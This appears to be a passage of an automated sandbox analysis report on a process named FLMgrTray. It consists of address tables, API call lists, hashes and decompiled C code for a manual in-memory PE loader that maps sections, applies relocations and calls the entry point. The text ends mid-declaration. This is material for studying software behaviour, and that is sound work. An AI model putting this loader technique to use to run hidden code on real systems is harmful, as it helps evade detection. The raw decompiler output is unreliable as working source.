                                                                                        0x0016454a
                                                                                        0x00164556
                                                                                        0x0016456a
                                                                                        0x00164572
                                                                                        0x00164575
                                                                                        0x0016457c
                                                                                        0x00164590
                                                                                        0x00164590
                                                                                        0x00164592
                                                                                        0x0016459d
                                                                                        0x001645a7
                                                                                        0x0016457e
                                                                                        0x0016457e
                                                                                        0x00164581
                                                                                        0x00164584
                                                                                        0x00164586
                                                                                        0x0016458c
                                                                                        0x001645aa
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458e
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458c
                                                                                        0x0016457c
                                                                                        0x00164544
                                                                                        0x0016443a
                                                                                        0x0016443f
                                                                                        0x00164446
                                                                                        0x00164449
                                                                                        0x0016444b
                                                                                        0x0016444d
                                                                                        0x0016444f
                                                                                        0x0016444f
                                                                                        0x00164452
                                                                                        0x00164454
                                                                                        0x00164457
                                                                                        0x00164459
                                                                                        0x0016445c
                                                                                        0x00164465
                                                                                        0x0016447c
                                                                                        0x00164470
                                                                                        0x00164472
                                                                                        0x00164478
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164472
                                                                                        0x0016448b
                                                                                        0x00164497
                                                                                        0x001644ae
                                                                                        0x001644be
                                                                                        0x001644be
                                                                                        0x001643ec
                                                                                        0x001643f0
                                                                                        0x001643f3
                                                                                        0x001643f8
                                                                                        0x001643fa
                                                                                        0x001643fa
                                                                                        0x00164400
                                                                                        0x00164404
                                                                                        0x00164416
                                                                                        0x00164426
                                                                                        0x00164426
                                                                                        0x001643b8
                                                                                        0x001643b8
                                                                                        0x001643bd
                                                                                        0x001643bf
                                                                                        0x001643bf
                                                                                        0x001643c9
                                                                                        0x001643d9
                                                                                        0x001643d9
                                                                                        0x001643b6

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(0000000F,?,2C80D730,00000000,?,2C80D730,?,?,?,?,2C80D730,?,2C80D730,?,?,?), ref: 001643C9
                                                                                        • memmove.VCRUNTIME140(?,?,2C80D730,00000000,?,2C80D730,?,?,?,?,2C80D730,?,2C80D730,?,?,?), ref: 00164404
                                                                                        • memmove.VCRUNTIME140(?,?,?,?,?,2C80D730,00000000,?,2C80D730,?,?,?,?,2C80D730,?,2C80D730), ref: 00164416
                                                                                        • memmove.VCRUNTIME140(2C80D730,?,?,00000000,?,2C80D730), ref: 0016448B
                                                                                        • memmove.VCRUNTIME140(?,?,2C80D730,2C80D730,?,?,00000000,?,2C80D730), ref: 00164497
                                                                                        • memcpy.VCRUNTIME140(?,?,2C80D730,?,?,2C80D730,2C80D730,?,?,00000000,?,2C80D730), ref: 001644AE
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,00000000,?,2C80D730), ref: 0016454A
                                                                                        • memcpy.VCRUNTIME140(2C80D730,?,2C80D730,00000000,?,?,80000000,00000000,?,2C80D730), ref: 00164556
                                                                                        • memcpy.VCRUNTIME140(?,?,?,2C80D730,?,2C80D730,00000000,?,?,80000000,00000000,?,2C80D730), ref: 0016456A
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,80000000,00000000,?,2C80D730), ref: 001645AA
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,00000000,?,2C80D730), ref: 001645B2
                                                                                        • memcpy.VCRUNTIME140(2C80D730,?,2C80D730,00000000,?,?,80000000,00000000,?,2C80D730), ref: 001645BE
                                                                                        • memcpy.VCRUNTIME140(?,?,?,2C80D730,?,2C80D730,00000000,?,?,80000000,00000000,?,2C80D730), ref: 001645D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memmove$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 4036893655-0
                                                                                        • Opcode ID: c0a58afe468dc2878cfbda6f0741698ff2af2df50506abfec5f6b79f126160bc
                                                                                        • Instruction ID: 373049be129f4559b30a421a6463d68820a83e7e9b16c98976f47247a1d0d467
                                                                                        • Opcode Fuzzy Hash: c0a58afe468dc2878cfbda6f0741698ff2af2df50506abfec5f6b79f126160bc
                                                                                        • Instruction Fuzzy Hash: 04816272A001199FCB14DF68DC819AE7BB5FF89310B14462AF915D7341E731DE619BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 61%
                                                                                        			E0016B800(void** __ecx, void* _a4, intOrPtr _a8, void* _a12, int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                        				void** _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr _v44;
                                                                                        				char _v48;
                                                                                        				intOrPtr _t140;
                                                                                        				void* _t142;
                                                                                        				void* _t154;
                                                                                        				void _t159;
                                                                                        				void* _t161;
                                                                                        				intOrPtr _t166;
                                                                                        				int _t168;
                                                                                        				intOrPtr* _t175;
                                                                                        				intOrPtr _t177;
                                                                                        				signed int _t181;
                                                                                        				void* _t186;
                                                                                        				void* _t192;
                                                                                        				void* _t203;
                                                                                        				void* _t205;
                                                                                        				intOrPtr _t209;
                                                                                        				intOrPtr _t210;
                                                                                        				intOrPtr _t211;
                                                                                        				void* _t212;
                                                                                        				void* _t213;
                                                                                        				intOrPtr _t214;
                                                                                        				intOrPtr _t216;
                                                                                        				void* _t217;
                                                                                        				intOrPtr* _t219;
                                                                                        				signed char _t220;
                                                                                        				intOrPtr _t221;
                                                                                        				intOrPtr _t222;
                                                                                        				void* _t237;
                                                                                        				void* _t240;
                                                                                        				intOrPtr _t242;
                                                                                        				void* _t248;
                                                                                        				intOrPtr _t250;
                                                                                        				void* _t252;
                                                                                        				signed int _t254;
                                                                                        				void* _t256;
                                                                                        				void* _t258;
                                                                                        				intOrPtr _t259;
                                                                                        				void* _t260;
                                                                                        				signed short* _t261;
                                                                                        				int _t262;
                                                                                        				void* _t264;
                                                                                        				signed int _t265;
                                                                                        				signed int _t268;
                                                                                        				void** _t269;
                                                                                        				intOrPtr* _t271;
                                                                                        				intOrPtr* _t272;
                                                                                        				intOrPtr _t273;
                                                                                        				intOrPtr _t274;
                                                                                        				void* _t275;
                                                                                        				void _t277;
                                                                                        				intOrPtr _t278;
                                                                                        				intOrPtr* _t279;
                                                                                        				void* _t280;
                                                                                        				void* _t282;
                                                                                        				int _t284;
                                                                                        				int _t285;
                                                                                        				void* _t286;
                                                                                        				void* _t287;
                                                                                        				void* _t288;
                                                                                        				void* _t289;
                                                                                        
                                                                                        				_t211 = _a8;
                                                                                        				_t273 = 0;
                                                                                        				_v8 = __ecx;
                                                                                        				if(_t211 < 0x40) {
                                                                                        					L3:
                                                                                        					SetLastError(0xd);
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t219 = _a4;
                                                                                        					if( *_t219 != 0x5a4d) {
                                                                                        						L60:
                                                                                        						SetLastError(0xc1);
                                                                                        						return 0;
                                                                                        					} else {
                                                                                        						_t250 =  *((intOrPtr*)(_t219 + 0x3c));
                                                                                        						_v12 = _t250;
                                                                                        						if(_t211 >= _t250 + 0xf8) {
                                                                                        							_t212 = _t250 + _t219;
                                                                                        							if( *((intOrPtr*)(_t250 + _t219)) != 0x4550 ||  *((intOrPtr*)(_t212 + 4)) != 0x14c) {
                                                                                        								goto L60;
                                                                                        							} else {
                                                                                        								_t220 =  *(_t212 + 0x38);
                                                                                        								if((_t220 & 0x00000001) != 0) {
                                                                                        									goto L60;
                                                                                        								} else {
                                                                                        									_t265 =  *(_t212 + 6) & 0x0000ffff;
                                                                                        									_t252 = ( *(_t212 + 0x14) & 0x0000ffff) + 0x24;
                                                                                        									if(_t265 != 0) {
                                                                                        										_t264 = _t252 + _t212;
                                                                                        										do {
                                                                                        											_t210 =  *((intOrPtr*)(_t264 + 4));
                                                                                        											_t264 = _t264 + 0x28;
                                                                                        											_t247 =  !=  ? _t210 : _t220;
                                                                                        											_t248 = ( !=  ? _t210 : _t220) +  *((intOrPtr*)(_t264 - 0x28));
                                                                                        											_t249 =  <=  ? _t273 : _t248;
                                                                                        											_t273 =  <=  ? _t273 : _t248;
                                                                                        											_t220 =  *(_t212 + 0x38);
                                                                                        											_t265 = _t265 - 1;
                                                                                        										} while (_t265 != 0);
                                                                                        									}
                                                                                        									__imp__GetNativeSystemInfo( &_v48);
                                                                                        									_t221 = _v44;
                                                                                        									_t254 =  !(_t221 - 1);
                                                                                        									_t268 = _t221 - 0x00000001 +  *((intOrPtr*)(_t212 + 0x50)) & _t254;
                                                                                        									if(_t268 != (_t221 - 0x00000001 + _t273 & _t254)) {
                                                                                        										goto L60;
                                                                                        									} else {
                                                                                        										_t274 = _a32;
                                                                                        										_t140 = _a12( *((intOrPtr*)(_t212 + 0x34)), _t268, 0x3000, 4, _t274);
                                                                                        										_t287 = _t286 + 0x14;
                                                                                        										_a32 = _t140;
                                                                                        										if(_t140 != 0) {
                                                                                        											L13:
                                                                                        											_t142 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                        											_t269 = _v8;
                                                                                        											_t222 = _a32;
                                                                                        											 *_t269 = _t142;
                                                                                        											if(_t142 != 0) {
                                                                                        												 *((intOrPtr*)(_t142 + 4)) = _t222;
                                                                                        												 *( *_t269 + 0x14) = ( *(_t212 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x1c)) = _a12;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x20)) = _a16;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x24)) = _a20;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x28)) = _a24;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x2c)) = _a28;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x34)) = _t274;
                                                                                        												 *((intOrPtr*)( *_t269 + 0x3c)) = _v44;
                                                                                        												if(E0016B3D0(_a8,  *(_t212 + 0x54)) == 0) {
                                                                                        													L35:
                                                                                        													E0016B610(_t269);
                                                                                        													return 0;
                                                                                        												} else {
                                                                                        													_t154 = _a12(_a32,  *(_t212 + 0x54), 0x1000, 4, _t274);
                                                                                        													_t213 = _a4;
                                                                                        													_t275 = _t154;
                                                                                        													memcpy(_t275, _t213,  *(_t212 + 0x54));
                                                                                        													_t288 = _t287 + 0x20;
                                                                                        													_a16 = 0;
                                                                                        													 *( *_t269) =  *((intOrPtr*)(_t213 + 0x3c)) + _t275;
                                                                                        													 *((intOrPtr*)( *( *_t269) + 0x34)) = _a32;
                                                                                        													_t237 =  *_t269;
                                                                                        													_t159 =  *_t237;
                                                                                        													_t214 =  *((intOrPtr*)(_t237 + 4));
                                                                                        													_t256 = ( *(_t159 + 0x14) & 0x0000ffff) + _t159;
                                                                                        													if(0 >=  *((intOrPtr*)(_t159 + 6))) {
                                                                                        														L30:
                                                                                        														_t277 =  *_t237;
                                                                                        														_t161 =  *((intOrPtr*)(_t277 + 0x34)) -  *((intOrPtr*)(_v12 + _a4 + 0x34));
                                                                                        														_a4 = _t161;
                                                                                        														if(_t161 == 0) {
                                                                                        															 *((intOrPtr*)(_t237 + 0x18)) = 1;
                                                                                        														} else {
                                                                                        															if( *((intOrPtr*)(_t277 + 0xa4)) != 0) {
                                                                                        																_t260 =  *((intOrPtr*)(_t237 + 4));
                                                                                        																_t271 =  *((intOrPtr*)(_t277 + 0xa0)) + _t260;
                                                                                        																_a12 = _t260;
                                                                                        																_t177 =  *_t271;
                                                                                        																if(_t177 != 0) {
                                                                                        																	asm("o16 nop [eax+eax]");
                                                                                        																	do {
                                                                                        																		_t242 =  *((intOrPtr*)(_t271 + 4));
                                                                                        																		_t217 = _t177 + _t260;
                                                                                        																		_t280 = 0;
                                                                                        																		_t261 = _t271 + 8;
                                                                                        																		if((_t242 - 0x00000008 & 0xfffffffe) > 0) {
                                                                                        																			do {
                                                                                        																				_t181 =  *_t261 & 0x0000ffff;
                                                                                        																				if((_t181 & 0x0000f000) == 0x3000) {
                                                                                        																					 *((intOrPtr*)((_t181 & 0x00000fff) + _t217)) =  *((intOrPtr*)((_t181 & 0x00000fff) + _t217)) + _a4;
                                                                                        																				}
                                                                                        																				_t242 =  *((intOrPtr*)(_t271 + 4));
                                                                                        																				_t280 = _t280 + 1;
                                                                                        																				_t261 =  &(_t261[1]);
                                                                                        																			} while (_t280 < _t242 - 8 >> 1);
                                                                                        																		}
                                                                                        																		_t177 =  *((intOrPtr*)(_t271 + _t242));
                                                                                        																		_t271 = _t271 + _t242;
                                                                                        																		_t260 = _a12;
                                                                                        																	} while (_t177 != 0);
                                                                                        																	_t237 =  *_v8;
                                                                                        																}
                                                                                        																_t269 = _v8;
                                                                                        																 *((intOrPtr*)(_t237 + 0x18)) = 1;
                                                                                        															} else {
                                                                                        																_t269 = _v8;
                                                                                        																 *((intOrPtr*)(_t237 + 0x18)) = 0;
                                                                                        															}
                                                                                        														}
                                                                                        														if(E0016B240(_t269) == 0 || E0016B4B0(_t269) == 0) {
                                                                                        															goto L35;
                                                                                        														} else {
                                                                                        															_t258 =  *_t269;
                                                                                        															_t240 = _t258;
                                                                                        															_t278 =  *((intOrPtr*)( *_t258 + 0xc0));
                                                                                        															if(_t278 != 0) {
                                                                                        																_t216 =  *((intOrPtr*)(_t258 + 4));
                                                                                        																_t279 =  *((intOrPtr*)(_t278 + _t216 + 0xc));
                                                                                        																if(_t279 != 0) {
                                                                                        																	_t175 =  *_t279;
                                                                                        																	if(_t175 != 0) {
                                                                                        																		do {
                                                                                        																			 *_t175(_t216, 1, 0);
                                                                                        																			_t175 =  *((intOrPtr*)(_t279 + 4));
                                                                                        																			_t279 = _t279 + 4;
                                                                                        																		} while (_t175 != 0);
                                                                                        																		_t240 =  *_t269;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        															_t166 =  *((intOrPtr*)( *_t240 + 0x28));
                                                                                        															if(_t166 == 0) {
                                                                                        																 *(_t240 + 0x38) = 0;
                                                                                        																return 1;
                                                                                        															} else {
                                                                                        																_t259 = _a32;
                                                                                        																_t168 = _t166 + _t259;
                                                                                        																if( *((intOrPtr*)(_t240 + 0x14)) == 0) {
                                                                                        																	 *(_t240 + 0x38) = _t168;
                                                                                        																	return 1;
                                                                                        																} else {
                                                                                        																	_push(0);
                                                                                        																	_push(1);
                                                                                        																	_push(_t259);
                                                                                        																	if( *_t168() != 0) {
                                                                                        																		 *((intOrPtr*)( *_t269 + 0x10)) = 1;
                                                                                        																		return 1;
                                                                                        																	} else {
                                                                                        																		SetLastError(0x45a);
                                                                                        																		E0016B610(_t269);
                                                                                        																		return 0;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													} else {
                                                                                        														_t186 = _t237;
                                                                                        														_t64 = _t256 + 0x24; // 0x24
                                                                                        														_t272 = _t64;
                                                                                        														_a12 = _t186;
                                                                                        														while(1) {
                                                                                        															_t262 =  *(_t272 + 4);
                                                                                        															if(_t262 != 0) {
                                                                                        																goto L23;
                                                                                        															}
                                                                                        															_t285 =  *(_v12 + _a4 + 0x38);
                                                                                        															if(_t285 <= 0) {
                                                                                        																L27:
                                                                                        																_t272 = _t272 + 0x28;
                                                                                        																_t284 = _a16 + 1;
                                                                                        																_a16 = _t284;
                                                                                        																_t237 =  *_v8;
                                                                                        																_a12 = _t237;
                                                                                        																if(_t284 >= ( *( *_t237 + 6) & 0x0000ffff)) {
                                                                                        																	_t269 = _v8;
                                                                                        																	goto L30;
                                                                                        																} else {
                                                                                        																	_t186 = _t237;
                                                                                        																	continue;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t203 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1c))))( *_t272 + _t214, _t285, 0x1000, 4,  *((intOrPtr*)(_t186 + 0x34)));
                                                                                        																_t289 = _t288 + 0x14;
                                                                                        																if(_t203 == 0) {
                                                                                        																	L34:
                                                                                        																	_t269 = _v8;
                                                                                        																	goto L35;
                                                                                        																} else {
                                                                                        																	_t205 =  *_t272 + _t214;
                                                                                        																	 *(_t272 - 4) = _t205;
                                                                                        																	memset(_t205, 0, _t285);
                                                                                        																	L26:
                                                                                        																	_t288 = _t289 + 0xc;
                                                                                        																	goto L27;
                                                                                        																}
                                                                                        															}
                                                                                        															goto L61;
                                                                                        															L23:
                                                                                        															if(_a8 <  *((intOrPtr*)(_t272 + 8)) + _t262) {
                                                                                        																SetLastError(0xd);
                                                                                        																goto L34;
                                                                                        															} else {
                                                                                        																_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x1c))))( *_t272 + _t214, _t262, 0x1000, 4,  *((intOrPtr*)(_t237 + 0x34)));
                                                                                        																_t289 = _t288 + 0x14;
                                                                                        																if(_t192 == 0) {
                                                                                        																	goto L34;
                                                                                        																} else {
                                                                                        																	_t282 =  *_t272 + _t214;
                                                                                        																	memcpy(_t282,  *((intOrPtr*)(_t272 + 8)) + _a4,  *(_t272 + 4));
                                                                                        																	 *(_t272 - 4) = _t282;
                                                                                        																	goto L26;
                                                                                        																}
                                                                                        															}
                                                                                        															goto L61;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												_a16(_t222, _t142, 0x8000, _t274);
                                                                                        												goto L15;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t209 = _a12(_t140, _t268, 0x3000, 4, _t274);
                                                                                        											_t287 = _t287 + 0x14;
                                                                                        											_a32 = _t209;
                                                                                        											if(_t209 == 0) {
                                                                                        												L15:
                                                                                        												SetLastError(0xe);
                                                                                        												return 0;
                                                                                        											} else {
                                                                                        												goto L13;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							goto L3;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L61:
                                                                                        			}


































































                                                                                        0x0016b807
                                                                                        0x0016b80b
                                                                                        0x0016b80d
                                                                                        0x0016b814
                                                                                        0x0016b837
                                                                                        0x0016b839
                                                                                        0x0016b847
                                                                                        0x0016b816
                                                                                        0x0016b816
                                                                                        0x0016b821
                                                                                        0x0016bc43
                                                                                        0x0016bc48
                                                                                        0x0016bc56
                                                                                        0x0016b827
                                                                                        0x0016b827
                                                                                        0x0016b82a
                                                                                        0x0016b835
                                                                                        0x0016b851
                                                                                        0x0016b854
                                                                                        0x00000000
                                                                                        0x0016b869
                                                                                        0x0016b869
                                                                                        0x0016b86f
                                                                                        0x00000000
                                                                                        0x0016b875
                                                                                        0x0016b879
                                                                                        0x0016b87d
                                                                                        0x0016b882
                                                                                        0x0016b884
                                                                                        0x0016b886
                                                                                        0x0016b886
                                                                                        0x0016b889
                                                                                        0x0016b88e
                                                                                        0x0016b891
                                                                                        0x0016b896
                                                                                        0x0016b899
                                                                                        0x0016b89b
                                                                                        0x0016b89e
                                                                                        0x0016b89e
                                                                                        0x0016b886
                                                                                        0x0016b8a7
                                                                                        0x0016b8ad
                                                                                        0x0016b8b6
                                                                                        0x0016b8c0
                                                                                        0x0016b8c6
                                                                                        0x00000000
                                                                                        0x0016b8cc
                                                                                        0x0016b8cc
                                                                                        0x0016b8db
                                                                                        0x0016b8de
                                                                                        0x0016b8e1
                                                                                        0x0016b8e6
                                                                                        0x0016b8ff
                                                                                        0x0016b90a
                                                                                        0x0016b910
                                                                                        0x0016b913
                                                                                        0x0016b916
                                                                                        0x0016b91a
                                                                                        0x0016b93d
                                                                                        0x0016b94c
                                                                                        0x0016b954
                                                                                        0x0016b95c
                                                                                        0x0016b964
                                                                                        0x0016b96c
                                                                                        0x0016b974
                                                                                        0x0016b979
                                                                                        0x0016b981
                                                                                        0x0016b993
                                                                                        0x0016bae4
                                                                                        0x0016bae6
                                                                                        0x0016baf3
                                                                                        0x0016b999
                                                                                        0x0016b9a7
                                                                                        0x0016b9ad
                                                                                        0x0016b9b0
                                                                                        0x0016b9b4
                                                                                        0x0016b9bc
                                                                                        0x0016b9c5
                                                                                        0x0016b9cc
                                                                                        0x0016b9d5
                                                                                        0x0016b9d8
                                                                                        0x0016b9da
                                                                                        0x0016b9dc
                                                                                        0x0016b9e3
                                                                                        0x0016b9e9
                                                                                        0x0016baab
                                                                                        0x0016baab
                                                                                        0x0016bab6
                                                                                        0x0016baba
                                                                                        0x0016babd
                                                                                        0x0016bb71
                                                                                        0x0016bac3
                                                                                        0x0016baca
                                                                                        0x0016baf6
                                                                                        0x0016baff
                                                                                        0x0016bb01
                                                                                        0x0016bb04
                                                                                        0x0016bb08
                                                                                        0x0016bb0a
                                                                                        0x0016bb10
                                                                                        0x0016bb10
                                                                                        0x0016bb13
                                                                                        0x0016bb16
                                                                                        0x0016bb18
                                                                                        0x0016bb23
                                                                                        0x0016bb25
                                                                                        0x0016bb25
                                                                                        0x0016bb36
                                                                                        0x0016bb40
                                                                                        0x0016bb40
                                                                                        0x0016bb43
                                                                                        0x0016bb46
                                                                                        0x0016bb47
                                                                                        0x0016bb4f
                                                                                        0x0016bb25
                                                                                        0x0016bb53
                                                                                        0x0016bb56
                                                                                        0x0016bb58
                                                                                        0x0016bb5b
                                                                                        0x0016bb62
                                                                                        0x0016bb62
                                                                                        0x0016bb64
                                                                                        0x0016bb6c
                                                                                        0x0016bacc
                                                                                        0x0016bacc
                                                                                        0x0016bad1
                                                                                        0x0016bad1
                                                                                        0x0016baca
                                                                                        0x0016bb81
                                                                                        0x00000000
                                                                                        0x0016bb96
                                                                                        0x0016bb96
                                                                                        0x0016bb98
                                                                                        0x0016bb9c
                                                                                        0x0016bba4
                                                                                        0x0016bba6
                                                                                        0x0016bba9
                                                                                        0x0016bbaf
                                                                                        0x0016bbb1
                                                                                        0x0016bbb5
                                                                                        0x0016bbb7
                                                                                        0x0016bbbc
                                                                                        0x0016bbbe
                                                                                        0x0016bbc1
                                                                                        0x0016bbc4
                                                                                        0x0016bbc8
                                                                                        0x0016bbc8
                                                                                        0x0016bbb5
                                                                                        0x0016bbaf
                                                                                        0x0016bbcc
                                                                                        0x0016bbd1
                                                                                        0x0016bc30
                                                                                        0x0016bc40
                                                                                        0x0016bbd3
                                                                                        0x0016bbd3
                                                                                        0x0016bbd6
                                                                                        0x0016bbdc
                                                                                        0x0016bc1f
                                                                                        0x0016bc2b
                                                                                        0x0016bbde
                                                                                        0x0016bbde
                                                                                        0x0016bbe0
                                                                                        0x0016bbe2
                                                                                        0x0016bbe7
                                                                                        0x0016bc0b
                                                                                        0x0016bc1a
                                                                                        0x0016bbe9
                                                                                        0x0016bbee
                                                                                        0x0016bbf6
                                                                                        0x0016bc03
                                                                                        0x0016bc03
                                                                                        0x0016bbe7
                                                                                        0x0016bbdc
                                                                                        0x0016bbd1
                                                                                        0x0016b9ef
                                                                                        0x0016b9ef
                                                                                        0x0016b9f1
                                                                                        0x0016b9f1
                                                                                        0x0016b9f4
                                                                                        0x0016b9f7
                                                                                        0x0016b9f7
                                                                                        0x0016b9fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016ba04
                                                                                        0x0016ba0a
                                                                                        0x0016ba85
                                                                                        0x0016ba88
                                                                                        0x0016ba8e
                                                                                        0x0016ba8f
                                                                                        0x0016ba92
                                                                                        0x0016ba94
                                                                                        0x0016ba9f
                                                                                        0x0016baa8
                                                                                        0x00000000
                                                                                        0x0016baa1
                                                                                        0x0016baa1
                                                                                        0x00000000
                                                                                        0x0016baa1
                                                                                        0x0016ba0c
                                                                                        0x0016ba22
                                                                                        0x0016ba24
                                                                                        0x0016ba29
                                                                                        0x0016bae1
                                                                                        0x0016bae1
                                                                                        0x00000000
                                                                                        0x0016ba2f
                                                                                        0x0016ba32
                                                                                        0x0016ba37
                                                                                        0x0016ba3a
                                                                                        0x0016ba82
                                                                                        0x0016ba82
                                                                                        0x00000000
                                                                                        0x0016ba82
                                                                                        0x0016ba29
                                                                                        0x00000000
                                                                                        0x0016ba41
                                                                                        0x0016ba49
                                                                                        0x0016badb
                                                                                        0x00000000
                                                                                        0x0016ba4f
                                                                                        0x0016ba62
                                                                                        0x0016ba64
                                                                                        0x0016ba69
                                                                                        0x00000000
                                                                                        0x0016ba6b
                                                                                        0x0016ba76
                                                                                        0x0016ba7a
                                                                                        0x0016ba7f
                                                                                        0x00000000
                                                                                        0x0016ba7f
                                                                                        0x0016ba69
                                                                                        0x00000000
                                                                                        0x0016ba49
                                                                                        0x0016b9f7
                                                                                        0x0016b9e9
                                                                                        0x0016b91c
                                                                                        0x0016b924
                                                                                        0x00000000
                                                                                        0x0016b927
                                                                                        0x0016b8e8
                                                                                        0x0016b8f2
                                                                                        0x0016b8f5
                                                                                        0x0016b8f8
                                                                                        0x0016b8fd
                                                                                        0x0016b92a
                                                                                        0x0016b92c
                                                                                        0x0016b93a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016b8fd
                                                                                        0x0016b8e6
                                                                                        0x0016b8c6
                                                                                        0x0016b86f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016b835
                                                                                        0x0016b821
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetLastError.KERNEL32(0000000D), ref: 0016B839
                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0016B8A7
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0016B903
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0016B90A
                                                                                        • SetLastError.KERNEL32(0000000E), ref: 0016B92C
                                                                                          • Part of subcall function 0016B3D0: SetLastError.KERNEL32(0000000D), ref: 0016B3DD
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 0016B9B4
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 0016BA3A
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 0016BA7A
                                                                                        • SetLastError.KERNEL32(0000000D), ref: 0016BADB
                                                                                        • SetLastError.KERNEL32(0000045A), ref: 0016BBEE
                                                                                        • SetLastError.KERNEL32(000000C1), ref: 0016BC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Heapmemcpy$AllocInfoNativeProcessSystemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1698011879-0
                                                                                        • Opcode ID: ee7e6296af7be92f04fd2d305d9b47947bfc0005d0ff3618d67f61fa0c9ad406
                                                                                        • Instruction ID: faaa550ab70f7df27ca645877dd9d71fe3f247ed7cdfa1a2317c9e43855fa9a7
                                                                                        • Opcode Fuzzy Hash: ee7e6296af7be92f04fd2d305d9b47947bfc0005d0ff3618d67f61fa0c9ad406
                                                                                        • Instruction Fuzzy Hash: 38E17A756052069FCB14CF68DCC0BAAB7A5FF88314F1541A9E909DB382E771EDA1CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 45%
                                                                                        			E00169650(void* __ebx, signed int* _a4, signed int _a8) {
                                                                                        				char _v0;
                                                                                        				signed int _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				void _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				signed int _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				char _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				signed int _v52;
                                                                                        				char _v68;
                                                                                        				char _v69;
                                                                                        				signed int _v76;
                                                                                        				signed int* _v80;
                                                                                        				signed int _v84;
                                                                                        				signed int _v88;
                                                                                        				signed int _v92;
                                                                                        				signed int _v96;
                                                                                        				char _v97;
                                                                                        				int _v104;
                                                                                        				char _v108;
                                                                                        				void* _v112;
                                                                                        				signed int _v116;
                                                                                        				signed int* _v120;
                                                                                        				void* _v132;
                                                                                        				void* _v192;
                                                                                        				void* _v204;
                                                                                        				char _v212;
                                                                                        				char _v236;
                                                                                        				void* _v264;
                                                                                        				char _v272;
                                                                                        				char _v288;
                                                                                        				unsigned int _v316;
                                                                                        				intOrPtr _v320;
                                                                                        				signed int* _v324;
                                                                                        				signed int _v336;
                                                                                        				char _v344;
                                                                                        				signed int _v348;
                                                                                        				intOrPtr _v352;
                                                                                        				signed int _v356;
                                                                                        				char _v372;
                                                                                        				signed int _v376;
                                                                                        				signed int* _v380;
                                                                                        				void* _v452;
                                                                                        				char _v532;
                                                                                        				intOrPtr _v540;
